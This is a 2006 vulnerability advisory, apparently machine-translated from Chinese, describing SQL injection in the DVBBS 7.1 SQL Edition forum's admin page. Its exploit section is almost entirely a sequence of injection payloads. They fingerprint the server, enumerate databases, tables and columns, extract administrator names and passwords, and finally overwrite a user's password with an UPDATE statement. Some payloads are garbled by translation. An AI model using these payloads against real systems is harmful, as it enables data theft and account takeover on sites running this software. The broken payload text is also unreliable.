DVBBS7. 1 SQL Edition cross-database vulnerability-vulnerability warning-the black bar safety net

2006-03-21T00:00:00
ID MYHACK58:6220068215
Type myhack58
Reporter 佚名
Modified 2006-03-21T00:00:00

Description

Author: Gui brother article source: www.54nb.cn Vulnerability test environment:DVBBS7. 1 SQL

Affected files admin/admin. asp .....

Exploit

(select @@version)>0 to obtain the Windows version number and user_name()='dbo' determine the current system user is not sa (select user_name())>0 proof the current system of the connected user (select db_name())>0 to get the current connected database (select IS_MEMBER('db_owner')) --query the database for the current user permissions

(select count() from master. dbo. sysdatabases where name>1 and dbid=7) ---query all the database names (select top 1 name from JxSoufun. dbo. sysobjects where xtype='U') --query the database table name (select top 1 name from JxSoufun. dbo. sysobjects where xtype='U' and name not in ('web_Admin')) --query the database to all table names (select count() from JxSoufun. dbo. sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --query the table name ID (select top 1 name from JxSoufun. dbo. syscolumns where id=1 1 2 5 5 7 9 0 4 8) - query a field name (select top 1 name from JxSoufun. dbo. syscolumns where id=1 1 2 5 5 7 9 0 4 8 and name not in('adminname')) --query all field names (select count() from JxSoufun. dbo. web_Admin where AdminName>1) -query the user (select count() from JxSoufun. dbo. web_Admin where Adminpwd>1 and username='bluefire') -query the user bluefire password ;update JxSoufun. dbo. Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--